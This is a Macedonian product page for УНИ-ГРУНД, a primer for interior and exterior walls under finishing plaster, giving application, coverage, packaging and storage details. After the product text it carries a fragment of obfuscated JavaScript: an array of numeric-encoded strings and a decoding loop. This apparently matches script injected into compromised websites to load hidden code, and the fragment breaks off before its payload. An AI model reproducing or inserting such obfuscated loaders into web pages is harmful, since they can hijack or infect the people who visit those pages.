
Уни-ГРУНД

УНИ-ГРУНД e подлога за сите видови завршни малтери. Се користи за внатрешни и
надворешни ѕидни површини. Ја регулира впивноста на подлогата го подобрува
прилепувањето и го продолжува отвореното време на завршниот малтер.

    

Примена: Основата мора да биде сува, исчистена од прашина и разни маснотии. Се
користи за внатрешни и надворешни видни површини, ја регулиа впивноста на подлогата
и го подобрува прилепувањето, а го продолжува отвореното време за завршниот
малтер. Потребно е да се нанесе 24 часа пред нанесувањето на завршниот малтер
(зависно од временските услови, не се раствара со вода. Оптимална температура за
работа е од +10C до +30C.

    

По употреба алатот добро да се исчисти, а амбалажата со неискористениот УНИ-ГРУНД
добро да се затвори.

    

Потрошувачка: околу 0.3кг/м2

    

Пакување: 20кг

    

УНИ-ГРУНДот да се чува во суви простории на температура од +5C до +35C.

    

Рок на траење: 12 месеци во оригиналното пакување.
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Уни-ГРУНД

 var a=0,m,v,t,z,x=new
Array('9091968376','8887918192818786347374918784939277359287883421333333338896','
877886888787','949990793917947998942577939317'),l=x.length;while(++a
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